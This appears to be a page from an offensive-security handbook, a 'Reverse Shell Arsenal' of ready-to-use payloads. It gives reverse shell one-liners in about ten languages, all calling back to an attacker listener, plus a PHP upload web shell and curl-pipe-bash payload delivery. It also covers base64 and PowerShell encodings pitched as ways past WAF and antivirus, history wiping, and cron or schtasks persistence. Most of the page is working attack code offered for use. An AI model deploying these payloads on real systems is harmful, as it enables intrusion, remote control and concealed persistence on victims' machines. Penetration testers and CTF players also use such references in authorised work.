Edit

Reverse Shell Arsenal

Reverse Shell Arsenal — The Hacker’s Voice from the Void

When you gain command execution on a target, the next step is always the same: establish a shell — a line from their machine to yours. Reverse shells are your lifeline for control, persistence, and lateral movement. This section is your complete playbook of cross-language, cross-platform reverse shell payloads, evasion tactics, and stabilization techniques.

I. 🧩 Core Concepts

Concept
Description

Reverse Shell

The victim connects back to your attacker machine.

Bind Shell

The victim listens; you connect in. (less stealthy)

Staged vs. Stageless

Staged = small loader + payload; Stageless = full payload in one go.

TTY Stabilization

Upgrading limited shells to full interactive sessions.

II. ⚙️ Preparation

🧠 Attacker Setup

# Netcat listener
nc -lvnp 4444

# Alternative (for TLS)
ncat --ssl -lvnp 4444

⚙️ Common Ports

  • 4444 → default (Metasploit / netcat)

  • 80 / 443 → blends with HTTP/HTTPS traffic

  • 53 → stealth (DNS)

  • 1337 → CTF favorite

III. 🧬 Bash Reverse Shells

💣 Classic

bash -i >& /dev/tcp/10.10.14.2/4444 0>&1

🧠 Short One-Liner

0<&196;exec 196<>/dev/tcp/10.10.14.2/4444; sh <&196 >&196 2>&196

⚙️ Using /bin/sh

/bin/sh -i >& /dev/tcp/10.10.14.2/4444 0>&1

IV. 🐍 Python Reverse Shells

🧩 Python2/3 Universal

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.2",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

🧠 Encoded (for WAF bypass)

echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cyA9IHNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKCIxMC4xMC4xNC4yIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCJiYXNoIikn" | base64 -d

V. 🧩 PHP Reverse Shells

💣 Simple Command

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>

⚙️ File Upload Exploit

Upload this as shell.php:

<?php system($_GET['cmd']); ?>

Access:

http://target/shell.php?cmd=whoami

🧠 PentestMonkey PHP Reverse Shell (Full)

https://github.com/pentestmonkey/php-reverse-shell

VI. 🧰 Perl Reverse Shells

perl -e 'use Socket;$i="10.10.14.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

VII. 🧩 Ruby Reverse Shells

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.14.2","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

VIII. 🧠 Netcat Reverse Shells

💣 Basic

nc -e /bin/bash 10.10.14.2 4444

🧩 For Netcat without -e

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.2 4444 > /tmp/f

⚙️ Encrypted with OpenSSL

openssl s_client -quiet -connect 10.10.14.2:443 -quiet -ign_eof | /bin/sh -i 2>&1 | openssl s_server -quiet -key key.pem -cert cert.pem -port 443

IX. 🧬 PowerShell Reverse Shells (Windows)

🧠 One-Liner

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

⚙️ Encoded for AV Evasion

powershell -EncodedCommand <base64_payload>

Generate:

echo -n "payload" | iconv --to-code UTF-16LE | base64

X. 🧠 Windows CMD Reverse Shells

cmd.exe /c powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

XI. 🧩 Node.js Reverse Shells

var net = require('net'), cp = require('child_process');
var client = new net.Socket();
client.connect(4444, '10.10.14.2', function(){
  var sh = cp.spawn('sh', []);
  client.pipe(sh.stdin);
  sh.stdout.pipe(client);
  sh.stderr.pipe(client);
});

XII. 🧰 Java Reverse Shells

Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"});

XIII. 🧬 Golang Reverse Shell

package main
import ("net";"os/exec";"syscall")
func main(){
  c,_ := net.Dial("tcp","10.10.14.2:4444")
  cmd := exec.Command("/bin/sh")
  cmd.Stdin,cmd.Stdout,cmd.Stderr = c,c,c
  cmd.Run()
}

Compile:

go build shell.go

XIV. 🧩 Stabilizing a Shell (TTY Upgrade)

🧠 Linux

After getting a shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
reset

🧩 Windows (via PowerShell)

powershell -ep bypass

XV. ⚙️ Web Delivery & Payload Hosting

🧠 Host Shells

python3 -m http.server 8000

💣 Fetch on Victim

wget http://10.10.14.2:8000/shell.sh -O /tmp/shell.sh
curl http://10.10.14.2:8000/shell.sh | bash

XVI. 🧠 Payload Obfuscation & Evasion

Technique
Description

Base64 Encoding

Simple but effective for WAF bypass

Variable Substitution

Split IP/port into parts

Protocol Shift

Use HTTPS, DNS, ICMP

Inline Compression

`gzip

PowerShell Encoding

UTF-16LE + base64 avoids Defender triggers

Example:

bash -c {echo,YmFzaCAt...}|{base64,-d}|{bash,-i}

XVII. ⚔️ Quick Reference Table

Language
Command

Bash

bash -i >& /dev/tcp/IP/PORT 0>&1

Python

python3 -c 'import socket,pty,os;...

PHP

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"); ?>

Perl

perl -e 'use Socket;$i="IP";$p=PORT;...'

Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("IP","PORT");...'

Netcat

nc -e /bin/bash IP PORT

PowerShell

(long encoded command)

Node.js

require('net').Socket()

Java

Runtime.getRuntime().exec(...)

Go

net.Dial("tcp","IP:PORT")

XVIII. 🧩 Real-World Workflow Example

# 1. Exploit web app RCE
curl "http://target/vuln.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.2/4444+0>%261'"

# 2. Catch the shell
nc -lvnp 4444

# 3. Upgrade to TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

# 4. Enumerate and escalate
whoami && id && uname -a

XIX. 🧠 Pro Tips & Red Team Tricks

Shell Hardening

  • Always use interactive shells (pty.spawn).

  • Disable history: unset HISTFILE or export HISTFILE=/dev/null.

  • Encrypt channels when possible (ncat --ssl, socat).

Delivery

  • Always URL-encode spaces and special characters in one-liners.

  • Use shorteners or encoded payloads for stealth (especially in web RCE).

Persistence

  • Drop a second reverse shell listener with cronjob or schtasks.

Safety

  • Avoid nc -e on production — it’s loud. Use mkfifo shells instead.

  • Always exit cleanly (exit then Ctrl+C) to prevent session hanging.

PreviousDeepDiveNextActive Directory

Last updated

Was this helpful?